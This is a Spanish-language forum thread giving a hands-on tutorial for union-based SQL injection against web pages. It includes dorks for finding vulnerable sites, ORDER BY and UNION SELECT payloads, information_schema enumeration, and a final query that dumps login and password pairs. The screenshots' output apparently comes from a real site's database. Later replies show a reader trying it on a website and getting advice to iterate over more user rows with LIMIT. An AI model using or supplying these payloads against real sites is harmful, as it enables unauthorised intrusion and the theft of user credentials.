Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: Stuxnet en 16 Junio 2014, 20:48 pm



Título: Union Based Sql Injection
Publicado por: Stuxnet en 16 Junio 2014, 20:48 pm
(http://2.bp.blogspot.com/-TUOqjSqv0ek/UreOkMHpw5I/AAAAAAAACQk/iuS_CAkC9wQ/s320/union_based_sql_injection.png)

0x1: Concepto:

Una Inyección SQL es una vulnerabilidad centrada en consultas hacia la base de datos, suele suceder cuando se inyecta una variable de consultas desde una identidad hacia la base de datos y asi obtener directamente información del usuario administrador, todas las tablas y columnas de la web.

El operador UNION se utiliza en las inyecciones SQL para unirse a una consulta, deliberadamente forjada por el consultor, a la consulta original. El resultado de la consulta realizada se unirá al resultado de la consulta original, permitiendo que el consultor obtener los valores de los campos de otras tablas.

0x2: Encontrar una página web vulnerable:

Para encontrar nuestra página vulnerable utilizaremos algunos dorks.

Código:
news.php?ID=
product.php?ID=
content.php?ID=
index.php?ID=

Para saber si nuestra página es vulnerable agregamos ' ) \ " al final.

Código:
http://www.ejemplo.com/news.php?id=44'

(http://1.bp.blogspot.com/-dZ7Gug7-kEA/UreOkBuaZ5I/AAAAAAAACQ4/UopmlXTQ-wo/s400/union_based_sql_injection1.png)

Como podemos observar es vulnerable.

0x3: Encontrar el número de columnas

Para encontrar el número de columnas utilizaremos la cláusula ORDER BY.

Código:
http://www.ejemplo.com/news.php?id=44 ORDER BY 1-- [ No Hay Error ]
http://www.ejemplo.com/news.php?id=44 ORDER BY 2-- [ No Hay Error ]
http://www.ejemplo.com/news.php?id=44 ORDER BY 3-- [ No Hay Error ]
http://www.ejemplo.com/news.php?id=44 ORDER BY 4-- [ No Hay Error ]
http://www.ejemplo.com/news.php?id=44 ORDER BY 5-- [ No Hay Error ]
http://www.ejemplo.com/news.php?id=44 ORDER BY 6-- [ No Hay Error ]
http://www.ejemplo.com/news.php?id=44 ORDER BY 7-- [ No Hay Error ]
http://www.ejemplo.com/news.php?id=44 ORDER BY 8-- [ No Hay Error ]
http://www.ejemplo.com/news.php?id=44 ORDER BY 9-- [ No Hay Error ]
http://www.ejemplo.com/news.php?id=44 ORDER BY 10-- [  Error ]

Como podemos observar al hacer la consulta ORDER BY 10 muestra el siguiente error:

(http://2.bp.blogspot.com/-uDv-pcZml9Q/UreOkMiha4I/AAAAAAAACQ0/055Nc70e3nM/s400/union_based_sql_injection2.png)

Esto quiere decir que la columna 10 no existe, solo existen 9.

0x4: Encontrar la columna vulnerable

Ahora debemos ejecutar la instrucción UNION SELECT

Código:
http://www.ejemplo.com/news.php?id=44 UNION SELECT 1,2,3,4,5,6,7,8,9--

(http://2.bp.blogspot.com/-aQM89T5QZnU/UreOksCpKVI/AAAAAAAACRU/G1Ju9VUV0sA/s320/union_based_sql_injection3.png)

Como podemos ver 4 y 5 son las columnas vulnerables...

0x5: Recopilación de Información: Nombre de la base de datos, Usuario actual, Versión SQL.

Reemplazamos el número 5 por: concat(database(),0x3a,user(),0x3a,version())

Código:
http://www.ejemplo.com/news.php?id=44 UNION SELECT 1,2,3,4,concat(database(),0x3a,user(),0x3a,version()),6,7,8,9--

(http://3.bp.blogspot.com/-vXU-EoHyUvE/UreOk8CZgbI/AAAAAAAACRI/Ox2-b2IHaZo/s400/union_based_sql_injection4.png)

Database Name : cecit_db_camara
Current User  : cecit_camara@localhost
SQL Version   : 5.5.32

0x6: Encontrar el nombre de las Tablas:

Para encontrar los nombres de tablas, usaremos la siguiente la sintaxis:

Código:
http://www.ejemplo.com/news.php?id=44 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9 FROM information_schema.tables WHERE table_schema=database()--

(http://3.bp.blogspot.com/-iWiPn-P3nzE/UreOlMq9VoI/AAAAAAAACRM/nsDsocI-3_Q/s400/union_based_sql_injection5.png)

0x7: Encontrar el nombre de las columnas en el nombre de las tablas:

Para encontrar los nombres de columnas, usaremos la siguiente la sintaxis:

Código:
http://www.ejemplo.com/news.php?id=44 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9 FROM information_schema.columns WHERE table_name = 0x7574696c69736174657572

Nota: para extraer esta información deben cifrar el nombre de la tabla en hexadecimal anteponiendo 0x, Para esto estoy utilizando la tabla utilisateur quedando 7574696c69736174657572.

0x8: Extraer Username y Passwords:

Para extraer Username y Passwords, usaremos la siguiente la sintaxis:

Código:
http://www.ejemplo.com/news.php?id=44 UNION SELECT 1,2,3,group_concat(login,0x3a,password),5,6,7,8,9 FROM utilisateur--+

(http://1.bp.blogspot.com/-sevYL1pxusA/UreOltyqaEI/AAAAAAAACRc/pkZkvU67IH8/s400/union_based_sql_injection7.png)


Título: Re: Union Based Sql Injection
Publicado por: el-brujo en 19 Junio 2014, 18:42 pm
Muy Relacionado:

Tutorial - Manual SQLmap: ataques SQLi - Inyección SQL
http://blog.elhacker.net/2014/06/sqlmap-automatizando-ataques-sqli-injection.html



Título: Re: Union Based Sql Injection
Publicado por: Stuxnet en 20 Junio 2014, 02:55 am
La unica diferencia que una lo haces de forma manual y la otra con la ayuda de una tool


Título: Re: Union Based Sql Injection
Publicado por: Camarografo77 en 21 Junio 2014, 23:29 pm
Muy Relacionado (y más completo):

http://foro.elhacker.net/nivel_web/gran_tutorial_sobre_inyecciones_sql_en_mysql-t247535.0.html


Título: Re: Union Based Sql Injection
Publicado por: jeanbkn en 7 Febrero 2015, 18:10 pm
Hola, sé que este tema ya es algo viejo y que probablemente me manden a leer el tutorial, pero me asalta una duda en el último paso que dijiste
Citar
0x8: Extraer Username y Passwords:

Para extraer Username y Passwords, usaremos la siguiente la sintaxis: ttp://www.ejemplo.com/news.php?id=44 UNION SELECT 1,2,3,group_concat(login,0x3a,password),5,6,7,8,9 FROM utilisateur--+

Lo he intentando con una web, sin embargo me sale sólo la primera fila, o el primer usuario con su respectivo mail... , esto significa que sólo hay un usuario? , o cómo podría sacar el segundo usuario y el tercer usuario? saludos :D


Título: Re: Union Based Sql Injection
Publicado por: Shell Root en 9 Febrero 2015, 13:08 pm
Es un tema viejo, deberías de abrir un tema nuevo. Pero con respecto a tu duda, sale el primero registros pero puedes iterar con los demas al usar el LIMIT.